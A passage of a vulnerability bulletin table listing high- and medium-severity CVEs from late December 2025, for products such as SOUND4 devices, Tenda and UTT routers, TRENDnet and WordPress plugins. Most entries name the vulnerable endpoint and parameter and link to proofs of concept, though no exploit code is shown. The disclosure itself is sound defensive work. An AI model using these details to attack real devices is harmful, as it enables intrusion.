| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an insecure direct object reference vulnerability that allows attackers to bypass authorization and access hidden system resources. Attackers can exploit the vulnerability by manipulating user-supplied input to execute privileged functionalities without proper authentication. | 2025-12-22 | 9.8 | CVE-2023-53955 | ExploitDB-51169 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5723) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Authorization Bypass via Insecure Object References |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated OS command injection vulnerability that allows remote attackers to execute arbitrary shell commands through the 'password' parameter. Attackers can exploit the login.php and index.php scripts by injecting shell commands via the 'password' POST parameter to execute commands with web server privileges. | 2025-12-22 | 9.8 | CVE-2023-53963 | ExploitDB-51173 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5738) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Unauthenticated Remote Command Injection |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco version 2.x contains an SQL injection vulnerability in the 'index.php' authentication mechanism that allows attackers to manipulate login credentials. Attackers can inject malicious SQL code through the 'password' POST parameter to bypass authentication and potentially gain unauthorized access to the system. | 2025-12-22 | 8.2 | CVE-2023-53960 | ExploitDB-51171 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5726) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x SQL Injection via Authentication Bypass |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated directory traversal vulnerability that allows remote attackers to write arbitrary files through the 'upgfile' parameter in upload.cgi. Attackers can exploit the vulnerability by sending crafted multipart form-data POST requests with directory traversal sequences to write files to unintended system locations. | 2025-12-22 | 7.5 | CVE-2023-53962 | ExploitDB-51172 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5730) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Unauthenticated Directory Traversal File Write |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco v2.x contains an unauthenticated vulnerability in the /usr/cgi-bin/restorefactory.cgi endpoint that allows remote attackers to reset device configuration. Attackers can send a POST request to the endpoint with specific data to trigger a factory reset and bypass authentication, gaining full system control. | 2025-12-22 | 7.5 | CVE-2023-53964 | ExploitDB-51174 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5742) VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x Unauthenticated Factory Reset Vulnerability |
| SOUND4 Ltd.--SOUND4 LinkAndShare Transmitter | SOUND4 LinkAndShare Transmitter 1.1.2 contains a format string vulnerability that allows attackers to trigger memory stack overflows through maliciously crafted environment variables. Attackers can manipulate the username environment variable with format string payloads to potentially execute arbitrary code and crash the application. | 2025-12-22 | 9.8 | CVE-2023-53966 | ExploitDB-51259 SOUND4 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5744) VulnCheck Advisory: SOUND4 LinkAndShare Transmitter 1.1.2 Format String Stack Buffer Overflow |
| SOUND4 Ltd.--SOUND4 Server Service | SOUND4 Server Service 4.1.102 contains an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during service startup. | 2025-12-22 | 8.4 | CVE-2023-53965 | ExploitDB-51167 SOUND4 Official Website Zero Science Lab Disclosure (ZSL-2022-5721) VulnCheck Advisory: SOUND4 Server Service 4.1.102 Local Privilege Escalation via Unquoted Service Path |
| Synaccess Networks Inc.--netBooter NP-02x/NP-08x | Synaccess netBooter NP-02x/NP-08x 6.8 contains an authentication bypass vulnerability in the webNewAcct.cgi script that allows unauthenticated attackers to create admin user accounts. Attackers can exploit the missing control check by sending crafted POST requests to create administrative accounts and gain unauthorized control over power supply management. | 2025-12-24 | 9.8 | CVE-2018-25134 | ExploitDB-45920 Vendor Product Homepage Zero Science Lab Disclosure (ZSL-2018-5500) |
| Tenda--CH22 | A weakness has been identified in Tenda CH22 1.0.0.1. Impacted is an unknown function of the file /public/. Manipulation can lead to path traversal. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-25 | 7.3 | CVE-2025-15076 | VDB-338333 \| Tenda CH22 public path traversal VDB-338333 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721411 \| Tenda CH22 V1.0.0.1 Authentication Bypass Issues https://github.com/master-abc/cve/blob/main/Tenda%20CH22%20V1.0.0.1%20Router%20Authentication%20Bypass%20Vulnerability%20in%20R7WebsSecurityHandler%20function.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A weakness has been identified in Tenda WH450 1.0.0.18. Affected by this vulnerability is an unknown functionality of the file /goform/CheckTools of the component HTTP Request Handler. Manipulation of the argument ipaddress causes a stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-22 | 9.8 | CVE-2025-15006 | VDB-337712 \| Tenda WH450 HTTP Request CheckTools stack-based overflow VDB-337712 \| CTI Indicators (IOB, IOC, IOA) Submit #719315 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/CheckTools/CheckTools.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/CheckTools/CheckTools.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A security vulnerability has been detected in Tenda WH450 1.0.0.18. Affected by this issue is some unknown functionality of the file /goform/L7Im of the component HTTP Request Handler. Manipulation of the argument page leads to a stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-22 | 9.8 | CVE-2025-15007 | VDB-337713 \| Tenda WH450 HTTP Request L7Im stack-based overflow VDB-337713 \| CTI Indicators (IOB, IOC, IOA) Submit #719316 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Im/L7Im.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Im/L7Im.md#poc https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. This issue affects some unknown processing of the file /goform/SafeUrlFilter. Manipulation of the argument page leads to a stack-based buffer overflow. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. | 2025-12-22 | 9.8 | CVE-2025-15010 | VDB-337716 \| Tenda WH450 SafeUrlFilter stack-based overflow VDB-337716 \| CTI Indicators (IOB, IOC, IOA) Submit #719219 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeUrlFilter/SafeUrlFilter.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeUrlFilter/SafeUrlFilter.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was detected in Tenda WH450 1.0.0.18. Impacted is an unknown function of the file /goform/NatStaticSetting. Manipulation of the argument page results in a stack-based buffer overflow. The attack can be performed remotely. The exploit is now public and may be used. | 2025-12-23 | 9.8 | CVE-2025-15044 | VDB-337849 \| Tenda WH450 NatStaticSetting stack-based overflow VDB-337849 \| CTI Indicators (IOB, IOC, IOA) Submit #720856 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/NatStaticSetting/NatStaticSetting.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/NatStaticSetting/NatStaticSetting.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A flaw has been found in Tenda WH450 1.0.0.18. The affected element is an unknown function of the file /goform/Natlimit of the component HTTP Request Handler. Manipulation of the argument page causes a stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-12-23 | 9.8 | CVE-2025-15045 | VDB-337850 \| Tenda WH450 HTTP Request Natlimit stack-based overflow VDB-337850 \| CTI Indicators (IOB, IOC, IOA) Submit #720882 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/Natlimit/Natlimit.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/Natlimit/Natlimit.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. The impacted element is an unknown function of the file /goform/PPTPClient of the component HTTP Request Handler. Manipulation of the argument netmsk leads to a stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-23 | 9.8 | CVE-2025-15046 | VDB-337851 \| Tenda WH450 HTTP Request PPTPClient stack-based overflow VDB-337851 \| CTI Indicators (IOB, IOC, IOA) Submit #720883 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPClient/PPTPClient.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPClient/PPTPClient.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was found in Tenda WH450 1.0.0.18. This affects an unknown function of the file /goform/PPTPDClient of the component HTTP Request Handler. Manipulation of the argument Username results in a stack-based buffer overflow. The attack can be initiated remotely. The exploit has been made public and could be used. | 2025-12-23 | 9.8 | CVE-2025-15047 | VDB-337852 \| Tenda WH450 HTTP Request PPTPDClient stack-based overflow VDB-337852 \| CTI Indicators (IOB, IOC, IOA) Submit #720884 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPDClient/PPTPDClient.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPDClient/PPTPDClient.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was detected in Tenda WH450 1.0.0.18. This affects an unknown part of the file /goform/L7Port of the component HTTP Request Handler. Manipulation of the argument page results in a stack-based buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-12-22 | 7.3 | CVE-2025-15008 | VDB-337714 \| Tenda WH450 HTTP Request L7Port stack-based overflow VDB-337714 \| CTI Indicators (IOB, IOC, IOA) Submit #719317 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Prot/L7Prot.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/L7Prot/L7Prot.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was determined in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/CheckTools of the component HTTP Request Handler. Manipulation of the argument ipaddress can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-23 | 7.3 | CVE-2025-15048 | VDB-337853 \| Tenda WH450 HTTP Request CheckTools command injection VDB-337853 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #720885 \| Tenda WH450 V1.0.0.18 Command Injection https://github.com/z472421519/BinaryAudit/blob/main/PoC/CMD/Tenda_WH450/CheckTools/CheckTools.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/CMD/Tenda_WH450/CheckTools/CheckTools.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/PPTPServer. Manipulation of the argument ip1 leads to a stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-28 | 7.2 | CVE-2025-15160 | VDB-338535 \| Tenda WH450 PPTPServer stack-based overflow VDB-338535 \| CTI Indicators (IOB, IOC, IOA) Submit #720886 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPServer/PPTPServer.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was found in Tenda WH450 1.0.0.18. Affected is an unknown function of the file /goform/PPTPUserSetting. Manipulation of the argument delno results in a stack-based buffer overflow. The attack can be carried out remotely. The exploit has been made public and could be used. | 2025-12-28 | 7.2 | CVE-2025-15161 | VDB-338536 \| Tenda WH450 PPTPUserSetting stack-based overflow VDB-338536 \| CTI Indicators (IOB, IOC, IOA) Submit #720887 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPUserSetting/PPTPUserSetting.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was determined in Tenda WH450 1.0.0.18. Affected by this vulnerability is an unknown functionality of the file /goform/RouteStatic. Manipulation of the argument page can lead to a stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-28 | 7.2 | CVE-2025-15162 | VDB-338537 \| Tenda WH450 RouteStatic stack-based overflow VDB-338537 \| CTI Indicators (IOB, IOC, IOA) Submit #721210 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/RouteStatic/RouteStatic.md https://www.tenda.com.cn/ |
| The GNU Project \| Free Software Foundation, Inc.--GNU Barcode | GNU Barcode 0.99 contains a buffer overflow vulnerability in its code 93 encoding process that allows attackers to trigger memory corruption. Attackers can exploit boundary errors during input file processing to potentially execute arbitrary code on the affected system. | 2025-12-24 | 9.8 | CVE-2018-25154 | ExploitDB-44797 GNU Barcode Official Product Page FSF Directory Entry for Barcode |
| The GNU Project \| Free Software Foundation, Inc.--GNU Barcode | GNU Barcode 0.99 contains a memory leak vulnerability in the command line processing function within cmdline.c. Attackers can exploit this vulnerability by providing specially crafted input that causes unfreed memory allocations, potentially leading to denial of service conditions. | 2025-12-24 | 7.5 | CVE-2018-25153 | ExploitDB-44798 GNU Barcode Product Homepage FSF Directory Entry for Barcode |
| thedigicraft--Atom CMS | Atom CMS 2.0 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries through unvalidated parameters. Attackers can inject malicious SQL code in the 'id' parameter of the admin index page to execute time-based blind SQL injection attacks. | 2025-12-22 | 8.2 | CVE-2023-53975 | ExploitDB-51086 Atom CMS GitHub Repository VulnCheck Advisory: Atom CMS 2.0 Unauthenticated SQL Injection via Admin Index Page |
| Thembay--Diza | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Thembay Diza allows PHP Local File Inclusion. This issue affects Diza: from n/a through 1.3.15. | 2025-12-23 | 7.5 | CVE-2025-68544 | https://vdp.patchstack.com/database/wordpress/theme/diza/vulnerability/wordpress-diza-theme-1-3-15-local-file-inclusion-vulnerability?_s_id=cve |
| Thembay--Nika | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Thembay Nika allows PHP Local File Inclusion. This issue affects Nika: from n/a through 1.2.14. | 2025-12-23 | 7.5 | CVE-2025-68546 | https://vdp.patchstack.com/database/wordpress/theme/nika/vulnerability/wordpress-nika-theme-1-2-14-local-file-inclusion-vulnerability?_s_id=cve |
| thibaud-rohmer--PhotoShow | PhotoShow 3.0 contains a remote code execution vulnerability that allows authenticated administrators to inject malicious commands through the exiftran path configuration. Attackers can exploit the ffmpeg configuration settings by base64 encoding a reverse shell command and executing it through a crafted video upload process. | 2025-12-22 | 7.2 | CVE-2023-53981 | ExploitDB-51236 Researcher Disclosure Software Repository VulnCheck Advisory: PhotoShow 3.0 Remote Code Execution via Exiftran Path Injection |
| TRENDnet--TEW-800MB | A security vulnerability has been detected in TRENDnet TEW-800MB 1.0.1.0. Affected is the function do_setWizard_asp of the file /goform/wizardset of the component Management Interface. The manipulation of the argument WizardConfigured leads to command injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 8.8 | CVE-2025-15136 | VDB-338514 \| TRENDnet TEW-800MB Management wizardset do_setWizard_asp command injection VDB-338514 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714042 \| TRENDnet TEW-800mb v1.0.1.0 Command Injection https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-800MB-2c7e5dd4c5a58067bc81e530bf3191c0 |
| TRENDnet--TEW-800MB | A vulnerability was detected in TRENDnet TEW-800MB 1.0.1.0. Affected by this vulnerability is the function sub_F934 of the file NTPSyncWithHost.cgi. The manipulation results in command injection. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 8.8 | CVE-2025-15137 | VDB-338515 \| TRENDnet TEW-800MB NTPSyncWithHost.cgi sub_F934 command injection VDB-338515 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #714241 \| TRENDnet TEW-800mb v1.0.1.0 Command Injection https://pentagonal-time-3a7.notion.site/TRENDnet-TEW-800MB-NTP-2c7e5dd4c5a580f999adcaff2c31978b |
| tychesoftwares--Print Invoice & Delivery Notes for WooCommerce | The Print Invoice & Delivery Notes for WooCommerce plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.8.0 via the 'WooCommerce_Delivery_Notes::update' function. This is due to missing capability check in the 'WooCommerce_Delivery_Notes::update' function, PHP enabled in Dompdf, and missing escape in the 'template.php' file. This makes it possible for unauthenticated attackers to execute code on the server. | 2025-12-24 | 9.8 | CVE-2025-13773 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e52b34fe-2414-4d6f-bf43-9c5b65ebf769?source=cve https://plugins.trac.wordpress.org/changeset/3426119/woocommerce-delivery-notes https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L347 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/class-woocommerce-delivery-notes.php#L473 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/templates/pdf/simple/invoice/template.php#L36 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/wcdn-front-function.php#L37 https://plugins.trac.wordpress.org/browser/woocommerce-delivery-notes/tags/5.8.0/includes/front/vendor/dompdf/dompdf/src/PhpEvaluator.php#L52 |
| UTT-- 512W | A vulnerability has been found in UTT 进取 512W up to 1.7.7-171114. This affects the function strcpy of the file /goform/APSecurity. The manipulation of the argument wepkey1 leads to buffer overflow. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. | 2025-12-25 | 8.8 | CVE-2025-15089 | VDB-338418 \| UTT 进取 512W APSecurity strcpy buffer overflow VDB-338418 \| CTI Indicators (IOB, IOC, IOA) Submit #708348 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/14.md https://github.com/cymiao1978/cve/blob/main/new/14.md#poc |
| UTT-- 512W | A vulnerability was found in UTT 进取 512W up to 1.7.7-171114. This vulnerability affects the function strcpy of the file /goform/formConfigNoticeConfig. The manipulation of the argument timestart results in buffer overflow. The attack may be performed remotely. The exploit has been made public and could be used. | 2025-12-25 | 8.8 | CVE-2025-15090 | VDB-338419 \| UTT 进取 512W formConfigNoticeConfig strcpy buffer overflow VDB-338419 \| CTI Indicators (IOB, IOC, IOA) Submit #708349 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/15.md https://github.com/cymiao1978/cve/blob/main/new/15.md#poc |
| UTT-- 512W | A vulnerability was determined in UTT 进取 512W up to 1.7.7-171114. This issue affects the function strcpy of the file /goform/formPictureUrl. This manipulation of the argument importpictureurl causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-25 | 8.8 | CVE-2025-15091 | VDB-338420 \| UTT 进取 512W formPictureUrl strcpy buffer overflow VDB-338420 \| CTI Indicators (IOB, IOC, IOA) Submit #708350 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/16.md https://github.com/cymiao1978/cve/blob/main/new/16.md#poc |
| UTT-- 512W | A vulnerability was identified in UTT 进取 512W up to 1.7.7-171114. Impacted is the function strcpy of the file /goform/ConfigExceptMSN. Such manipulation of the argument remark leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-12-26 | 8.8 | CVE-2025-15092 | VDB-338421 \| UTT 进取 512W ConfigExceptMSN strcpy buffer overflow VDB-338421 \| CTI Indicators (IOB, IOC, IOA) Submit #708351 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/17.md https://github.com/cymiao1978/cve/blob/main/new/17.md#poc |
| Verisay Communication and Information Technology Industry and Trade Ltd. Co.--Aidango | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Aidango allows Cross-Site Scripting (XSS). This issue affects Aidango: before 2.144.4. | 2025-12-25 | 7.6 | CVE-2025-2307 | https://www.usom.gov.tr/bildirim/tr-25-0487 |
| Verisay Communication and Information Technology Industry and Trade Ltd. Co.--Titarus | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Titarus allows Cross-Site Scripting (XSS). This issue affects Titarus: before 2.144.4. | 2025-12-25 | 7.6 | CVE-2025-2405 | https://www.usom.gov.tr/bildirim/tr-25-0485 |
| Verisay Communication and Information Technology Industry and Trade Ltd. Co.--Trizbi | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Verisay Communication and Information Technology Industry and Trade Ltd. Co. Trizbi allows Cross-Site Scripting (XSS). This issue affects Trizbi: before 2.144.4. | 2025-12-25 | 7.6 | CVE-2025-2406 | https://www.usom.gov.tr/bildirim/tr-25-0486 |
| VillaTheme--WPBulky | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VillaTheme WPBulky allows Blind SQL Injection. This issue affects WPBulky: from n/a through 1.1.13. | 2025-12-23 | 7.6 | CVE-2025-68550 | https://vdp.patchstack.com/database/wordpress/plugin/wpbulky-wp-bulk-edit-post-types/vulnerability/wordpress-wpbulky-plugin-1-1-13-sql-injection-vulnerability?_s_id=cve |
| Wondershare--Wondershare MirrorGo | Wondershare MirrorGo 2.0.11.346 contains a local privilege escalation vulnerability due to incorrect file permissions on executable files. Unprivileged local users can replace the ElevationService.exe with a malicious file to execute arbitrary code with LocalSystem privileges. | 2025-12-22 | 8.4 | CVE-2022-50690 | ExploitDB-50787 Wondershare Official Homepage VulnCheck Advisory: Wondershare MirrorGo 2.0.11.346 Local Privilege Escalation via Insecure File Permissions |
| WPJobBoard--WPJobBoard | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPJobBoard allows Blind SQL Injection. This issue affects WPJobBoard: from n/a through 5.9.0. | 2025-12-24 | 8.6 | CVE-2023-36525 | https://vdp.patchstack.com/database/wordpress/plugin/wpjobboard/vulnerability/wordpress-wpjobboard-plugin-5-9-0-unauth-blind-sql-injection-sqli-vulnerability?_s_id=cve |
| Xspeeder--SXZOS | Xspeeder SXZOS through 2025-12-26 allows root remote code execution via base64-encoded Python code in the chkid parameter to vLogin.py. The title and oIP parameters are also used. | 2025-12-27 | 10 | CVE-2025-54322 | https://www.xspeeder.com https://pwn.ai/blog/cve-2025-54322-zeroday-unauthenticated-root-rce-affecting-70-000-hosts |
| Zillya--Zillya Total Security | Zillya Total Security 3.0.2367.0 contains a privilege escalation vulnerability that allows low-privileged users to copy files to unauthorized system locations using the quarantine module. Attackers can leverage symbolic link techniques to restore quarantined files to restricted directories, potentially enabling system-level access through techniques like DLL hijacking. | 2025-12-22 | 8.4 | CVE-2023-53973 | ExploitDB-51151 Zillya Official Homepage VulnCheck Advisory: Zillya Total Security 3.0.2367.0 Local Privilege Escalation via Quarantine Module |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AVE S.p.A.--DOMINAplus | AVE DOMINAplus 1.10.x contains cross-site request forgery and cross-site scripting vulnerabilities that allow attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to exploit login.php parameters and execute arbitrary scripts in user browser sessions. | 2025-12-24 | 5.3 | CVE-2019-25233 | ExploitDB-47821 AVE S.p.A. Official Website DOMINAplus Product Page Zero Science Lab Disclosure (ZSL-2019-5547) |
| Beward R&D Co., Ltd--BEWARD Intercom | Beward Intercom 2.3.1 contains a credentials disclosure vulnerability that allows local attackers to access plain-text authentication credentials stored in an unencrypted database file. Attackers can read the BEWARD.INTERCOM.FDB file to extract usernames and passwords, enabling unauthorized access to IP cameras and door stations. | 2025-12-24 | 6.2 | CVE-2018-25130 | ExploitDB-46267 Beward Product Homepage Zero Science Lab Disclosure (ZSL-2019-5505) |
| Beward R&D Co., Ltd--N100 H.264 VGA IP Camera | Beward N100 H.264 VGA IP Camera M2.1.6 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft a malicious web page with a hidden form to add an admin user by tricking a logged-in user into submitting the form. | 2025-12-24 | 5.3 | CVE-2019-25247 | ExploitDB-46318 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5510) |
| bnayawpguy--Resoto | Missing Authorization vulnerability in bnayawpguy Resoto allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Resoto: from n/a through 1.0.8. | 2025-12-24 | 4.3 | CVE-2023-28619 | https://vdp.patchstack.com/database/wordpress/theme/resoto/vulnerability/wordpress-resoto-theme-1-0-8-authenticated-arbitrary-plugin-activation?_s_id=cve |
| Bob--Hostel | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Bob Hostel allows DOM-Based XSS. This issue affects Hostel: from n/a through 1.1.5.1. | 2025-12-24 | 5.9 | CVE-2023-32120 | https://vdp.patchstack.com/database/wordpress/plugin/hostel/vulnerability/wordpress-hostel-plugin-1-1-5-1-cross-site-scripting-xss?_s_id=cve |
| BTicino S.p.A.--Legrand BTicino Driver Manager F454 | Legrand BTicino Driver Manager F454 1.0.51 contains multiple web vulnerabilities that allow attackers to perform administrative actions without proper request validation. Attackers can exploit cross-site request forgery to change passwords and inject stored cross-site scripting payloads through unvalidated GET parameters. | 2025-12-24 | 5.3 | CVE-2019-25244 | ExploitDB-46850 BTicino Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5521) Zero Science Lab Disclosure (ZSL-2019-5522) |
| Carlo Gavazzi AB--SmartHouse Webapp | SmartHouse Webapp 6.5.33 contains multiple cross-site request forgery and cross-site scripting vulnerabilities that allow attackers to perform unauthorized actions. Attackers can exploit these vulnerabilities by tricking logged-in users into visiting malicious websites or injecting malicious scripts into various application parameters. | 2025-12-24 | 5.3 | CVE-2019-25234 | ExploitDB-47730 SmartHouse Product Website Zero Science Lab Disclosure (ZSL-2019-5553) |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Hostgroup configuration page) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19, from 23.10.0 before 23.10.29. | 2025-12-22 | 6.8 | CVE-2025-54890 | https://github.com/centreon/centreon/releases |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Notification rules, Open tickets module) allows Stored XSS by users with elevated privileges. This issue affects Infra Monitoring: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4. | 2025-12-22 | 6.8 | CVE-2025-8460 | https://github.com/centreon/centreon/releases |
| checkpoint--Identity Agent | An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being accessible in the Windows Registry keys for Check Point Identity Agent running on a Terminal Server. | 2025-12-22 | 6.5 | CVE-2025-8304 | https://support.checkpoint.com/results/sk/sk184263 |
| checkpoint--Identity Awareness | An authenticated local user can obtain information that allows claiming security policy rules of another user due to sensitive information being printed in plaintext in Identity Agent for Terminal Services debug files. | 2025-12-22 | 6.5 | CVE-2025-8305 | https://support.checkpoint.com/results/sk/sk184264 |
| ChenJinchuang--Lin-CMS-TP5 | A flaw has been found in ChenJinchuang Lin-CMS-TP5 up to 0.3.3. This vulnerability affects the function Upload of the file application/lib/file/LocalUploader.php of the component File Upload Handler. Executing manipulation of the argument File can lead to code injection. The attack can be executed remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 6.3 | CVE-2025-15129 | VDB-338507 \| ChenJinchuang Lin-CMS-TP5 File Upload LocalUploader.php upload code injection VDB-338507 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #712754 \| lin-cms-tp5 1.0 Unrestricted Upload https://github.com/ChenJinchuang/lin-cms-tp5/issues/65 |
